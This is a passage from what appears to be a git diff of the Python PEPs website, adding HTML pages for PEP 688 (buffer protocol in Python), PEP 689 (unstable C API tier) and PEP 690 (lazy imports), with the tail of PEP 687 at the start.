Note: this is a suggested implementation plan for a complex module, based on +lessons learned with other modules. Feel free to simplify it for +smaller modules.

+
    +
  1. Add Argument Clinic where possible; it enables you to easily use the +defining class to fetch module state from type methods.
  2. +
  3. Prepare for module state; establish a module state struct, add an instance +as a static global variable, and create helper stubs for fetching the module +state.
  4. +
  5. Add relevant global variables to the module state struct, and modify code +that accesses the global state to use the module state helpers instead. This +step may be broken into several PR’s.
  6. +
  7. Where necessary, convert static types to heap types.
  8. +
  9. Convert the global module state struct to true module state.
  10. +
  11. Implement multi-phase initialisation.
  12. +
+

Steps 4 through 6 should preferably land in a single alpha development phase.

+
+
+
+
+

Backwards Compatibility

+

Extension modules in the standard library will now be loadable more than once. +For example, deleting such a module from sys.modules and re-importing it +will result in a fresh module instance, isolated from any previously loaded +instances.

+

This may affect code that expected the previous behavior: globals of +extension modules were shallowly copied from the first loaded module.

+
+
+

Security Implications

+

None known.

+
+
+

How to Teach This

+

A large part of this proposal is a HOWTO aimed at experienced users, +which will be moved to the documentation.

+

Beginners should not be affected.

+
+
+

Reference Implementation

+

Most of the changes are now in the main branch, as commits for these issues:

+ +

As an example, changes and fix-ups done in the _csv module are:

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0687.rst

+

Last modified: 2023-10-04 23:18:07 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0688/index.html b/pep-0688/index.html new file mode 100644 index 00000000000..9a5cf94ae3b --- /dev/null +++ b/pep-0688/index.html @@ -0,0 +1,574 @@ + + + + + + + + PEP 688 – Making the buffer protocol accessible in Python | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 688 – Making the buffer protocol accessible in Python

+
+
Author:
+
Jelle Zijlstra <jelle.zijlstra at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
23-Apr-2022
+
Python-Version:
+
3.12
+
Post-History:
+
23-Apr-2022, +25-Apr-2022, +06-Oct-2022, +26-Oct-2022
+
Resolution:
+
07-Mar-2023
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at Emulating buffer types.

+

×

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

This PEP proposes a Python-level API for the buffer protocol, +which is currently accessible only to C code. This allows type +checkers to evaluate whether objects implement the protocol.

+
+
+

Motivation

+

The CPython C API provides a versatile mechanism for accessing the +underlying memory of an object—the buffer protocol +introduced in PEP 3118. +Functions that accept binary data are usually written to handle any +object implementing the buffer protocol. For example, at the time of writing, +there are around 130 functions in CPython using the Argument Clinic +Py_buffer type, which accepts the buffer protocol.

+

Currently, there is no way for Python code to inspect whether an object +supports the buffer protocol. Moreover, the static type system +does not provide a type annotation to represent the protocol. +This is a common problem +when writing type annotations for code that accepts generic buffers.

+

Similarly, it is impossible for a class written in Python to support +the buffer protocol. A buffer class in +Python would give users the ability to easily wrap a C buffer object, or to test +the behavior of an API that consumes the buffer protocol. Granted, this is not +a particularly common need. However, there has been a +CPython feature request +for supporting buffer classes written in Python that has been open since 2012.

+
+
+

Rationale

+
+

Current options

+

There are two known workarounds for annotating buffer types in +the type system, but neither is adequate.

+

First, the current workaround +for buffer types in typeshed is a type alias +that lists well-known buffer types in the standard library, such as +bytes, bytearray, memoryview, and array.array. This +approach works for the standard library, but it does not extend to +third-party buffer types.

+

Second, the documentation +for typing.ByteString currently states:

+
+
This type represents the types bytes, bytearray, and +memoryview of byte sequences.

As a shorthand for this type, bytes can be used to annotate +arguments of any of the types mentioned above.

+
+

Although this sentence has been in the documentation +since 2015, +the use of bytes to include these other types is not specified +in any of the typing PEPs. Furthermore, this mechanism has a number of +problems. It does not include all possible buffer types, and it +makes the bytes type ambiguous in type annotations. After all, +there are many operations that are valid on bytes objects, but +not on memoryview objects, and it is perfectly possible for +a function to accept bytes but not memoryview objects. +A mypy user +reports +that this shortcut has caused significant problems for the psycopg project.

+
+
+

Kinds of buffers

+

The C buffer protocol supports +many options, +affecting strides, contiguity, and support for writing to the buffer. Some of these +options would be useful in the type system. For example, typeshed +currently provides separate type aliases for writable and read-only +buffers.

+

However, in the C buffer protocol, most of these options cannot be +queried directly on the type object. The only way to figure out +whether an object supports a particular flag is to actually +ask for the buffer. For some types, such as memoryview, +the supported flags depend on the instance. As a result, it would +be difficult to represent support for these flags in the type system.

+
+
+
+

Specification

+
+

Python-level buffer protocol

+

We propose to add two Python-level special methods, __buffer__ +and __release_buffer__. Python +classes that implement these methods are usable as buffers from C +code. Conversely, classes implemented in C that support the +buffer protocol acquire synthesized methods accessible from Python +code.

+

The __buffer__ method is called to create a buffer from a Python +object, for example by the memoryview() constructor. +It corresponds to the bf_getbuffer C slot. +The Python signature for this method is +def __buffer__(self, flags: int, /) -> memoryview: .... The method +must return a memoryview object. If the bf_getbuffer slot +is invoked on a Python class with a __buffer__ method, +the interpreter extracts the underlying Py_buffer from the +memoryview returned by the method +and returns it to the C caller. Similarly, if Python code calls the +__buffer__ method on an instance of a C class that +implements bf_getbuffer, the returned buffer is wrapped in a +memoryview for consumption by Python code.

+

The __release_buffer__ method should be called when a caller no +longer needs the buffer returned by __buffer__. It corresponds to the +bf_releasebuffer C slot. This is an +optional part of the buffer protocol. +The Python signature for this method is +def __release_buffer__(self, buffer: memoryview, /) -> None: .... +The buffer to be released is wrapped in a memoryview. When this +method is invoked through CPython’s buffer API (for example, through +calling memoryview.release on a memoryview returned by +__buffer__), the passed memoryview is the same object +as was returned by __buffer__. It is +also possible to call __release_buffer__ on a C class that +implements bf_releasebuffer.

+

If __release_buffer__ exists on an object, +Python code that calls __buffer__ directly on the object must +call __release_buffer__ on the same object when it is done +with the buffer. Otherwise, resources used by the object may +not be reclaimed. Similarly, it is a programming error +to call __release_buffer__ without a previous call to +__buffer__, or to call it multiple times for a single call +to __buffer__. For objects that implement the C buffer protocol, +calls to __release_buffer__ where the argument is not a +memoryview wrapping the same object will raise an exception. +After a valid call to __release_buffer__, the memoryview +is invalidated (as if its release() method had been called), +and any subsequent calls to __release_buffer__ with the same +memoryview will raise an exception. +The interpreter will ensure that misuse +of the Python API will not break invariants at the C level – for +example, it will not cause memory safety violations.

+
+
+

inspect.BufferFlags

+

To help implementations of __buffer__, we add inspect.BufferFlags, +a subclass of enum.IntFlag. This enum contains all flags defined in the +C buffer protocol. For example, inspect.BufferFlags.SIMPLE has the same +value as the PyBUF_SIMPLE constant.

+
+
+

collections.abc.Buffer

+

We add a new abstract base classes, collections.abc.Buffer, +which requires the __buffer__ method. +This class is intended primarily for use in type annotations:

+
def need_buffer(b: Buffer) -> memoryview:
+    return memoryview(b)
+
+need_buffer(b"xy")  # ok
+need_buffer("xy")  # rejected by static type checkers
+
+
+

It can also be used in isinstance and issubclass checks:

+
>>> from collections.abc import Buffer
+>>> isinstance(b"xy", Buffer)
+True
+>>> issubclass(bytes, Buffer)
+True
+>>> issubclass(memoryview, Buffer)
+True
+>>> isinstance("xy", Buffer)
+False
+>>> issubclass(str, Buffer)
+False
+
+
+

In the typeshed stub files, the class should be defined as a Protocol, +following the precedent of other simple ABCs in collections.abc such as +collections.abc.Iterable or collections.abc.Sized.

+
+
+

Example

+

The following is an example of a Python class that implements the +buffer protocol:

+
import contextlib
+import inspect
+
+class MyBuffer:
+    def __init__(self, data: bytes):
+        self.data = bytearray(data)
+        self.view = None
+
+    def __buffer__(self, flags: int) -> memoryview:
+        if flags != inspect.BufferFlags.FULL_RO:
+            raise TypeError("Only BufferFlags.FULL_RO supported")
+        if self.view is not None:
+            raise RuntimeError("Buffer already held")
+        self.view = memoryview(self.data)
+        return self.view
+
+    def __release_buffer__(self, view: memoryview) -> None:
+        assert self.view is view  # guaranteed to be true
+        self.view.release()
+        self.view = None
+
+    def extend(self, b: bytes) -> None:
+        if self.view is not None:
+            raise RuntimeError("Cannot extend held buffer")
+        self.data.extend(b)
+
+buffer = MyBuffer(b"capybara")
+with memoryview(buffer) as view:
+    view[0] = ord("C")
+
+    with contextlib.suppress(RuntimeError):
+        buffer.extend(b"!")  # raises RuntimeError
+
+buffer.extend(b"!")  # ok, buffer is no longer held
+
+with memoryview(buffer) as view:
+    assert view.tobytes() == b"Capybara!"
+
+
+
+
+

Equivalent for older Python versions

+

New typing features are usually backported to older Python versions +in the typing_extensions +package. Because the buffer protocol +is currently accessible only in C, this PEP cannot be fully implemented +in a pure-Python package like typing_extensions. As a temporary +workaround, an abstract base class typing_extensions.Buffer +will be provided for Python versions +that do not have collections.abc.Buffer available.

+

After this PEP is implemented, inheriting from collections.abc.Buffer will +not be necessary to indicate that an object supports the buffer protocol. +However, in older Python versions, it will be necessary to explicitly +inherit from typing_extensions.Buffer to indicate to type checkers that +a class supports the buffer protocol, since objects supporting the buffer +protocol will not have a __buffer__ method. It is expected that this +will happen primarily in stub files, because buffer classes are necessarily +implemented in C code, which cannot have types defined inline. +For runtime uses, the ABC.register API can be used to register +buffer classes with typing_extensions.Buffer.

+
+
+

No special meaning for bytes

+

The special case stating that bytes may be used as a shorthand +for other ByteString types will be removed from the typing +documentation. +With collections.abc.Buffer available as an alternative, there will be no good +reason to allow bytes as a shorthand. +Type checkers currently implementing this behavior +should deprecate and eventually remove it.

+
+
+
+

Backwards Compatibility

+
+

__buffer__ and __release_buffer__ attributes

+

As the runtime changes in this PEP only add new functionality, there are +few backwards compatibility concerns.

+

However, code that uses a __buffer__ or __release_buffer__ attribute for +other purposes may be affected. While all dunders are technically reserved for the +language, it is still good practice to ensure that a new dunder does not +interfere with too much existing code, especially widely used packages. A survey +of publicly accessible code found:

+
    +
  • PyPy supports +a __buffer__ method with compatible semantics to those proposed in this +PEP. A PyPy core developer expressed his support +for this PEP.
  • +
  • pyzmq implements +a PyPy-compatible __buffer__ method.
  • +
  • mpi4py defines +a SupportsBuffer protocol that would be equivalent to this PEP’s collections.abc.Buffer.
  • +
  • NumPy used to have an undocumented behavior where it would access a __buffer__ attribute +(not method) to get an object’s buffer. This was removed +in 2019 for NumPy 1.17. The behavior would have last worked in NumPy 1.16, which only supported +Python 3.7 and older. Python 3.7 will have reached its end of life by the time this PEP is expected to +be implemented.
  • +
+

Thus, this PEP’s use of the __buffer__ method will improve interoperability with +PyPy and not interfere with the current versions of any major Python packages.

+

No publicly accessible code uses the name __release_buffer__.

+
+
+

Removal of the bytes special case

+

Separately, the recommendation to remove the special behavior for +bytes in type checkers does have a backwards compatibility +impact on their users. An experiment +with mypy shows that several major open source projects that use it +for type checking will see new errors if the bytes promotion +is removed. Many of these errors can be fixed by improving +the stubs in typeshed, as has already been done for the +builtins, +binascii, +pickle, and +re modules. +A review of all +usage of bytes types in typeshed is in progress. +Overall, the change improves type safety and makes the type system +more consistent, so we believe the migration cost is worth it.

+
+
+
+

How to Teach This

+

We will add notes pointing to collections.abc.Buffer in appropriate places in the +documentation, such as typing.readthedocs.io +and the mypy cheat sheet. +Type checkers may provide additional pointers in their error messages. For example, +when they encounter a buffer object being passed to a function that +is annotated to only accept bytes, the error message could include a note suggesting +the use of collections.abc.Buffer instead.

+
+
+

Reference Implementation

+

An implementation of this PEP is +available +in the author’s fork.

+
+
+

Rejected Ideas

+
+

types.Buffer

+

An earlier version of this PEP proposed adding a new types.Buffer type with +an __instancecheck__ implemented in C so that isinstance() checks can be +used to check whether a type implements the buffer protocol. This avoids the +complexity of exposing the full buffer protocol to Python code, while still +allowing the type system to check for the buffer protocol.

+

However, that approach +does not compose well with the rest of the type system, because types.Buffer +would be a nominal type, not a structural one. For example, there would be no way +to represent “an object that supports both the buffer protocol and __len__”. With +the current proposal, __buffer__ is like any other special method, so a +Protocol can be defined combining it with another method.

+

More generally, no other part of Python works like the proposed types.Buffer. +The current proposal is more consistent with the rest of the language, where +C-level slots usually have corresponding Python-level special methods.

+
+
+

Keep bytearray compatible with bytes

+

It has been suggested to remove the special case where memoryview is +always compatible with bytes, but keep it for bytearray, because +the two types have very similar interfaces. However, several standard +library functions (e.g., re.compile, socket.getaddrinfo, and most +functions accepting path-like arguments) accept +bytes but not bytearray. In most codebases, bytearray is also +not a very common type. We prefer to have users spell out accepted types +explicitly (or use Protocol from PEP 544 if only a specific set of +methods is required). This aspect of the proposal was specifically +discussed +on the typing-sig mailing list, without any strong disagreement from the +typing community.

+
+
+

Distinguish between mutable and immutable buffers

+

The most frequently used distinction within buffer types is +whether or not the buffer is mutable. Some functions accept only +mutable buffers (e.g., bytearray, some memoryview objects), +others accept all buffers.

+

An earlier version of this PEP proposed using the presence of the +bf_releasebuffer slot to determine whether a buffer type is mutable. +This rule holds for most standard library buffer types, but the relationship +between mutability and the presence of this slot is not absolute. For +example, numpy arrays are mutable but do not have this slot.

+

The current buffer protocol does not provide any way to reliably +determine whether a buffer type represents a mutable or immutable +buffer. Therefore, this PEP does not add type system support +for this distinction. +The question can be revisited in the future if the buffer protocol +is enhanced to provide static introspection support. +A sketch +for such a mechanism exists.

+
+
+
+

Acknowledgments

+

Many people have provided useful feedback on drafts of this PEP. +Petr Viktorin has been particularly helpful in improving my understanding +of the subtleties of the buffer protocol.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0688.rst

+

Last modified: 2024-10-17 12:49:39 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0689/index.html b/pep-0689/index.html new file mode 100644 index 00000000000..261dc42f05f --- /dev/null +++ b/pep-0689/index.html @@ -0,0 +1,402 @@ + + + + + + + + PEP 689 – Unstable C API tier | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 689 – Unstable C API tier

+
+
Author:
+
Petr Viktorin <encukou at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Requires:
+
523
+
Created:
+
22-Apr-2022
+
Python-Version:
+
3.12
+
Post-History:
+
27-Apr-2022, +25-Aug-2022, +27-Oct-2022
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at Changing Python’s C API.

+

×

+

User-facing documentation is at Unstable C API.

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

Some functions and types of the C-API are designated unstable, +meaning that they will not change in patch (bugfix/security) releases, +but may change between minor releases (e.g. between 3.11 and 3.12) without +deprecation warnings.

+

Any C API with a leading underscore is designated internal, meaning that it +may change or disappear without any notice.

+
+
+

Motivation & Rationale

+
+

Unstable C API tier

+

The Python C-API is currently divided into three stability tiers:

+
    +
  • Limited API, with high compatibility expectations
  • +
  • Public API, which follows the backwards compatibility policy, and requires deprecation warnings before changes
  • +
  • Internal (private) API, which can change at any time.
  • +
+

Tools requiring access to CPython internals (e.g. advanced +debuggers and JIT compilers) are often built for minor series releases +of CPython, and assume that the C-API internals used do not change +in patch releases. To support these tools, we need a tier between the +Public and Private C-API, with guarantees on stability throughout +the minor-series release: the proposed Unstable tier.

+

Some functions, like PyCode_New(), are documented as unstable +(“Calling [it] directly can bind you to a precise Python version”), +and also often change in practice. +The unstable tier should make their status obvious even to people who don’t +read the docs carefully enough, making them hard to use accidentally.

+
+
+

Reserving leading underscores for Private API

+

Currently, CPython developers don’t agree on the exact meaning of a leading +underscore in API names. +It is used to mean two different things:

+
    +
  • API that may change between minor releases, as in the Unstable tier proposed +here (e.g. functions introduced in PEP 523).
  • +
  • API that is private and should not be used outside of CPython at all +(e.g. because it may change without notice, or it relies on undocumented +assumptions that non-CPython code cannot guarantee).
  • +
+

The unclear meaning makes the underscore less useful than it could be. +If it only marked private API, CPython developers could change underscored +functions, or remove unused ones, without researching how they’re +documented or used outside CPython.

+

With the introduction of a dedicated unstable tier, we can clarify the meaning +of the leading underscore. It should mark private API only.

+
+
+

Not breaking code unnecessarily

+

This PEP specifies that API in the unstable tier should have a special name +prefix. This means functions (macros, etc.) will need to be renamed. +After a rename, the old name should continue to be available until +an incompatible change is made (i.e. until call sites need to be updated +anyway). +In other words, just changing the tier of a function shouldn’t break users’ +code.

+
+
+
+

Specification

+

The C API is divided by stability expectations into three “sections” +(internal, public, and limited). +We’ll now call these stability tiers, or tiers for short.

+

An Unstable tier will be added.

+

APIs (functions, types, etc.) in this tier will named with the PyUnstable_ +prefix, with no leading underscore.

+

They will be declared in headers used for public API (Include/*.h, +rather than in a subdirectory like Include/unstable/).

+

Several rules for dealing with the unstable tier will be introduced:

+
    +
  • Unstable API should have no backwards-incompatible +changes across patch releases, but may change or be removed in minor +releases (3.x.0, including Alpha and Beta releases of 3.x.0). +Such changes must be documented and mentioned in the What’s New document.
  • +
  • Backwards-incompatible changes to these APIs should be made so that +code that uses them will need to be updated to compile with +the new version (e.g. arguments should be added/removed, or a function should +be renamed, but the semantic meaning of an argument should not change).
  • +
  • Unstable API should be documented and tested.
  • +
  • To move an API from the public tier to the unstable tier, it should be +exposed under the new PyUnstable_* name.

    The old name should be deprecated (e.g. with Py_DEPRECATED), but +continue to be available until an incompatible change is made to the API. +Per Python’s backwards compatibility policy (PEP 387), this deprecation +needs to last at least two releases (without an SC exceptions). +But it can also last indefinitely – for example, if PEP 590’s +“provisional” +_PyObject_Vectorcall was added today, it would be initially named +PyUnstable_Object_Vectorcall and there would be no plan to remove +this name.

    +

    In the following cases, an incompatible change (and thus removing the +deprecated name) is allowed without an SC exception, as if the function was +already part of the Unstable tier:

    +
      +
    • Any API introduced before Python 3.12 that is documented to be less +stable than default.
    • +
    • Any API introduced before Python 3.12 that was named with a leading +underscore.
    • +
    +

    For examples, see the initial unstable API +specified in this PEP.

    +
  • +
  • To move an internal API to the unstable tier, it should be +exposed under the new PyUnstable_* name.

    If the old name is documented, or widely used externally, +it should continue to be available until an +incompatible change is made (and call sites need to be updated). +It should start raising deprecation warnings (e.g. using Py_DEPRECATED).

    +
  • +
  • To move an API from the unstable tier to the public tier, it should be +exposed without the PyUnstable_* prefix.

    The old name should remain available until the API is deprecated or removed.

    +
  • +
  • Adding new unstable API for existing features is allowed even after +Beta feature freeze, up until the first Release Candidate. +Consensus on Core Development Discourse or is needed in the Beta period.
  • +
+

These rules will be documented in the devguide, +and user documentation +will be updated accordingly.

+

Reference docs for C API named PyUnstable_* will automatically show +notes with links to the unstable tier documentation.

+
+

Leading underscore

+

C API named with a leading underscore, as well as API only available with +Py_BUILD_CORE, will be considered internal. +This means:

+
    +
  • It may change or be removed without notice in minor +releases (3.x.0, including Alpha and Beta releases of 3.x.0). +API changes in patch releases or Release Candidates should only be done if +absolutely necessary.
  • +
  • It should be documented in source comments or Devguide only, not in the +public documentation.
  • +
  • API introduced before Python 3.12 that is documented or widely used +externally should be moved to the Unstable tier as explained above.

    This might happen long after this PEP is accepted. +Consequently, for a few years core devs should do some research before +changing underscored API, especially if it doesn’t need Py_BUILD_CORE.

    +
  • +
+

Users of the C API are encouraged to search their codebase for _Py and +_PY identifier prefixes, and treat any hits as issues to be eventually +fixed – either by switching to an existing alternative, or by opening +a CPython issue to request exposing public API for their use case, +and eventually switching to that.

+
+
+

Initial unstable API

+

The following API will be moved to the Unstable tier in the initial +implementation as proof of the concept.

+

Code object constructors:

+
    +
  • PyUnstable_Code_New() (renamed from PyCode_New)
  • +
  • PyUnstable_Code_NewWithPosOnlyArgs() (renamed from PyCode_NewWithPosOnlyArgs)
  • +
+

Code extra information (PEP 523):

+
    +
  • PyUnstable_Eval_RequestCodeExtraIndex() (renamed from _PyEval_RequestCodeExtraIndex)
  • +
  • PyUnstable_Code_GetExtra() (renamed from _PyCode_GetExtra)
  • +
  • PyUnstable_Code_SetExtra() (renamed from _PyCode_SetExtra)
  • +
+

More are expected in Python 3.12, without the need for another PEP.

+
+
+
+

Backwards Compatibility

+

The C API backwards compatibility expectations will be made clearer.

+

All renamed API will be available under old names for as long as feasible.

+
+
+

How to Teach This

+

The changes affect advanced C programmers, who should consult the +updated reference documentation, devguide and/or What’s New document.

+
+
+

Reference Implementation

+

https://github.com/python/cpython/compare/main…encukou:unstable-tier

+
+
+

Rejected Ideas

+
+

No special prefix

+

In the initial version of this PEP, unstable API didn’t have the PyUnstable +prefix. +Instead, defining Py_USING_UNSTABLE_API made the API available in a given +source file, signifying acknowledgement that the file as a whole will +potentially need to be revisited for each Python release.

+

However, it was decided that unstable-ness needs to be exposed +in the individual names.

+
+
+

Underscore prefix

+

It would be possible to mark both private and unstable API with +leading underscores. +However, that would dilute the meaning of _Py prefix. +Reserving the prefix for internal API only makes it trivial to search for.

+
+
+

New header directory

+

Other API tiers have dedicated directories for headers +(Include/cpython/, Include/internal/).

+

Since the unstable tier uses a very obvious naming convention +and the names are always available, +a directory like Include/unstable/ is unnecessary.

+
+
+

Python API

+

It might be good to add a similar tier in the Python (not C) API, +e.g. for types.CodeType. +However, the mechanism for that would need to be different. +This is outside the scope of the PEP.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0689.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0690/index.html b/pep-0690/index.html new file mode 100644 index 00000000000..c67824f2a92 --- /dev/null +++ b/pep-0690/index.html @@ -0,0 +1,937 @@ + + + + + + + + PEP 690 – Lazy Imports | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 690 – Lazy Imports

+
+
Author:
+
Germán Méndez Bravo <german.mb at gmail.com>, Carl Meyer <carl at oddbird.net>
+
Sponsor:
+
Barry Warsaw <barry at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
29-Apr-2022
+
Python-Version:
+
3.12
+
Post-History:
+
03-May-2022, +03-May-2022
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a feature to transparently defer the finding and execution of +imported modules until the moment when an imported object is first used. Since +Python programs commonly import many more modules than a single invocation of +the program is likely to use in practice, lazy imports can greatly reduce the +overall number of modules loaded, improving startup time and memory usage. Lazy +imports also mostly eliminate the risk of import cycles.

+
+
+

Motivation

+

Common Python code style prefers imports at module +level, so they don’t have to be repeated within each scope the imported object +is used in, and to avoid the inefficiency of repeated execution of the import +system at runtime. This means that importing the main module of a program +typically results in an immediate cascade of imports of most or all of the +modules that may ever be needed by the program.

+

Consider the example of a Python command line program (CLI) with a number of +subcommands. Each subcommand may perform different tasks, requiring the import +of different dependencies. But a given invocation of the program will only +execute a single subcommand, or possibly none (i.e. if just --help usage +info is requested). Top-level eager imports in such a program will result in the +import of many modules that will never be used at all; the time spent (possibly +compiling and) executing these modules is pure waste.

+

To improve startup time, some large Python CLIs make imports lazy by manually +placing imports inline into functions to delay imports of expensive subsystems. +This manual approach is labor-intensive and fragile; one misplaced import or +refactor can easily undo painstaking optimization work.

+

The Python standard library already includes built-in support for lazy imports, +via importlib.util.LazyLoader. +There are also third-party packages such as demandimport. These provide a “lazy module +object” which delays its own import until first attribute access. This is not +sufficient to make all imports lazy: imports such as from foo import a, b +will still eagerly import the module foo since they immediately access an +attribute from it. It also imposes noticeable runtime overhead on every module +attribute access, since it requires a Python-level __getattr__ or +__getattribute__ implementation.

+

Authors of scientific Python packages have also made extensive use of lazy +imports to allow users to write e.g. import scipy as sp and then easily +access many different submodules with e.g. sp.linalg, without requiring all +the many submodules to be imported up-front. SPEC 1 codifies this practice in the +form of a lazy_loader library that can be used explicitly in a package +__init__.py to provide lazily accessible submodules.

+

Users of static typing also have to import names for use in type annotations +that may never be used at runtime (if PEP 563 or possibly in future +PEP 649 are used to avoid eager runtime evaluation of annotations). Lazy +imports are very attractive in this scenario to avoid overhead of unneeded +imports.

+

This PEP proposes a more general and comprehensive solution for lazy imports +that can encompass all of the above use cases and does not impose detectable +overhead in real-world use. The implementation in this PEP has already +demonstrated +startup time improvements up to 70% and memory-use reductions up to 40% on +real-world Python CLIs.

+

Lazy imports also eliminate most import cycles. With eager imports, “false +cycles” can easily occur which are fixed by simply moving an import to the +bottom of a module or inline into a function, or switching from from foo +import bar to import foo. With lazy imports, these “cycles” just work. +The only cycles which will remain are those where two modules actually each use +a name from the other at module level; these “true” cycles are only fixable by +refactoring the classes or functions involved.

+
+
+

Rationale

+

The aim of this feature is to make imports transparently lazy. “Lazy” means +that the import of a module (execution of the module body and addition of the +module object to sys.modules) should not occur until the module (or a name +imported from it) is actually referenced during execution. “Transparent” means +that besides the delayed import (and necessarily observable effects of that, +such as delayed import side effects and changes to sys.modules), there is +no other observable change in behavior: the imported object is present in the +module namespace as normal and is transparently loaded whenever first used: its +status as a “lazy imported object” is not directly observable from Python or +from C extension code.

+

The requirement that the imported object be present in the module namespace as +usual, even before the import has actually occurred, means that we need some +kind of “lazy object” placeholder to represent the not-yet-imported object. +The transparency requirement dictates that this placeholder must never be +visible to Python code; any reference to it must trigger the import and replace +it with the real imported object.

+

Given the possibility that Python (or C extension) code may pull objects +directly out of a module __dict__, the only way to reliably prevent +accidental leakage of lazy objects is to have the dictionary itself be +responsible to ensure resolution of lazy objects on lookup.

+

When a lookup finds that the key references a lazy object, it resolves the lazy +object immediately before returning it. To avoid side effects mutating +dictionaries midway through iteration, all lazy objects in a dictionary are +resolved prior to starting an iteration; this could incur a performance penalty +when using bulk iterations (iter(dict), reversed(dict), +dict.__reversed__(), dict.keys(), iter(dict.keys()) and +reversed(dict.keys())). To avoid this performance penalty on the vast +majority of dictionaries, which never contain any lazy objects, we steal a bit +from the dk_kind field for a new dk_lazy_imports flag to keep track of +whether a dictionary may contain lazy objects or not.

+

This implementation comprehensively prevents leakage of lazy objects, ensuring +they are always resolved to the real imported object before anyone can get hold +of them for any use, while avoiding any significant performance impact on +dictionaries in general.

+
+
+

Specification

+

Lazy imports are opt-in, and they can be globally enabled either via a new +-L flag to the Python interpreter, or via a call to a new +importlib.set_lazy_imports() function. This function takes two arguments, a +boolean enabled and an excluding container. If enabled is true, lazy +imports will be turned on from that point forward. If it is false, they will be +turned off from that point forward. (Use of the excluding keyword is +discussed below under “Per-module opt-out.”)

+

When the flag -L is passed to the Python interpreter, a new +sys.flags.lazy_imports is set to True, otherwise it exists as False. +This flag is used to propagate -L to new Python subprocesses.

+

The flag in sys.flags.lazy_imports does not necessarily reflect the current +status of lazy imports, only whether the interpreter was started with the -L +option. Actual current status of whether lazy imports are enabled or not at any +moment can be retrieved using importlib.is_lazy_imports_enabled(), which +will return True if lazy imports are enabled at the call point or False +otherwise.

+

When lazy imports are enabled, the loading and execution of all (and only) +top-level imports is deferred until the imported name is first used. This could +happen immediately (e.g. on the very next line after the import statement) or +much later (e.g. while using the name inside a function being called by some +other code at some later time.)

+

For these top level imports, there are two contexts which will make them eager +(not lazy): imports inside try / except / finally or with +blocks, and star imports (from foo import *.) Imports inside +exception-handling blocks (this includes with blocks, since those can also +“catch” and handle exceptions) remain eager so that any exceptions arising from +the import can be handled. Star imports must remain eager since performing the +import is the only way to know which names should be added to the namespace.

+

Imports inside class definitions or inside functions/methods are not “top +level” and are never lazy.

+

Dynamic imports using __import__() or importlib.import_module() are +also never lazy.

+

Lazy imports state (i.e. whether they have been enabled, and any excluded +modules; see below) is per-interpreter, but global within the interpreter (i.e. +all threads will be affected).

+
+

Example

+

Say we have a module spam.py:

+
# simulate some work
+import time
+time.sleep(10)
+print("spam loaded")
+
+
+

And a module eggs.py which imports it:

+
import spam
+print("imports done")
+
+
+

If we run python -L eggs.py, the spam module will never be imported +(because it is never referenced after the import), "spam loaded" will never +be printed, and there will be no 10 second delay.

+

But if eggs.py simply references the name spam after importing it, that +will be enough to trigger the import of spam.py:

+
import spam
+print("imports done")
+spam
+
+
+

Now if we run python -L eggs.py, we will see the output "imports done" +printed first, then a 10 second delay, and then "spam loaded" printed after +that.

+

Of course, in real use cases (especially with lazy imports), it’s not +recommended to rely on import side effects like this to trigger real work. This +example is just to clarify the behavior of lazy imports.

+

Another way to explain the effect of lazy imports is that it is as if each lazy +import statement had instead been written inline in the source code immediately +before each use of the imported name. So one can think of lazy imports as +similar to transforming this code:

+
import foo
+
+def func1():
+    return foo.bar()
+
+def func2():
+    return foo.baz()
+
+
+

To this:

+
def func1():
+    import foo
+    return foo.bar()
+
+def func2():
+    import foo
+    return foo.baz()
+
+
+

This gives a good sense of when the import of foo will occur under lazy +imports, but lazy import is not really equivalent to this code transformation. +There are several notable differences:

+
    +
  • Unlike in the latter code, under lazy imports the name foo still does +exist in the module’s global namespace, and can be imported or referenced by +other modules that import this one. (Such references would also trigger the +import.)
  • +
  • The runtime overhead of lazy imports is much lower than the latter code; after +the first reference to the name foo which triggers the import, subsequent +references will have zero import system overhead; they are indistinguishable +from a normal name reference.
  • +
+

In a sense, lazy imports turn the import statement into just a declaration of an +imported name or names, to later be fully resolved when referenced.

+

An import in the style from foo import bar can also be made lazy. When the +import occurs, the name bar will be added to the module namespace as a lazy +import. The first reference to bar will import foo and resolve bar +to foo.bar.

+
+
+

Intended usage

+

Since lazy imports are a potentially-breaking semantic change, they should be +enabled only by the author or maintainer of a Python application, who is +prepared to thoroughly test the application under the new semantics, ensure it +behaves as expected, and opt-out any specific imports as needed (see below). +Lazy imports should not be enabled speculatively by the end user of a Python +application with any expectation of success.

+

